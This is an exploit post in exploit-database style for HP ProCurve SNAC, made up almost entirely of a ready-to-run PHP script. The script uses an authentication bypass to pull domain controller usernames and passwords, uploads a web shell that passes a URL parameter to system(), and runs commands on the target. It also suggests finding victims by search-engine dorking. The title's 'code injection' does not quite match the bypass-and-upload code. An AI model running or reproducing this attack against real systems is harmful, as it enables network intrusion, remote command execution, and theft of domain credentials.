=============================================================================================================================================
| # Title     : HP ProCurve SNAC Domain Controller PHP Code Injection Vulnerability                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US                                             |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Exploiting an authentication bypass vulnerability to obtain Domain Controller Credentials in HP ProCurve SNAC.
	
	( https://packetstorm.news/files/id/180690/ )
	
[+] save code as poc.php.

[+] Set Target : line 129

[+] USage : php poc.php 

[+] PayLoad :

<?php

class HPSNACExploit {
    private $target;
    private $port;
    private $cookie;

    public function __construct($target, $port = 443) {
        $this->target = $target;
        $this->port = $port;
    }

    private function sendRequest($url, $useCookie = false) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$url");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        
        if ($useCookie && $this->cookie) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: {$this->cookie}"]);
        }
        
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    public function getSession() {
        $response = $this->sendRequest("/RegWeb/html/snac/index.html");
        preg_match('/Set-Cookie: (.*?);/', $response, $matches);
        
        if (!empty($matches[1])) {
            $this->cookie = $matches[1];
            return true;
        }
        return false;
    }

    public function getDomainInfo() {
        return $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", true);
    }

    public function parseDomainData($data) {
        $xml = simplexml_load_string($data);
        $results = [];
        
        foreach ($xml->Controllers->Domain as $domain) {
            $results[] = [
                'dc_ip' => (string)$domain->domainControllerIP,
                'port' => (string)$domain->port,
                'service' => (string)$domain->connType,
                'user' => (string)$domain->userName,
                'password' => (string)$domain->password
            ];
        }
        return $results;
    }

    public function uploadShell() {
        $shellContent = "<?php system(\$_GET['cmd']); ?>";
        $uploadUrl = "/RegWeb/uploads/shell.php";
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$uploadUrl");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, ["file" => $shellContent]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        if (strpos($response, "success") !== false) {
            echo "[+] Web shell uploaded successfully: https://{$this->target}/RegWeb/uploads/shell.php?cmd=whoami\n";
        } else {
            echo "[-] Failed to upload web shell.\n";
        }
    }

    public function executeCommand($cmd) {
        $url = "/RegWeb/RegWeb/ExecuteCommandServlet?cmd=" . urlencode($cmd);
        $response = $this->sendRequest($url, true);
        echo "[+] Command Output: \n$response\n";
    }

    public function exploit() {
        echo "[*] Trying to get session...\n";
        if (!$this->getSession()) {
            echo "[-] Failed to get a valid session.\n";
            return;
        }
        
        echo "[*] Exploiting authentication bypass...\n";
        $domainInfo = $this->getDomainInfo();
        
        if (!$domainInfo || strpos($domainInfo, 'domainName') === false) {
            echo "[-] Target is not vulnerable.\n";
            return;
        }
        
        echo "[*] Uploading web shell...\n";
        $this->uploadShell();
        
        echo "[*] Executing command: whoami\n";
        $this->executeCommand("whoami");
        
        echo "[*] Parsing domain controller credentials...\n";
        $credentials = $this->parseDomainData($domainInfo);
        
        if (empty($credentials)) {
            echo "[!] No domain controllers found.\n";
            return;
        }
        
        echo "\nDomain Controllers Credentials:\n";
        echo "-------------------------------------\n";
        foreach ($credentials as $cred) {
            echo "DC IP: {$cred['dc_ip']}\n";
            echo "Username: {$cred['user']}\n";
            echo "Password: {$cred['password']}\n";
            echo "-------------------------------------\n";
        }
    }
}

// Usage example
$target = "192.168.1.1"; // استبدل بعنوان IP الهدف
$exploit = new HPSNACExploit($target);
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================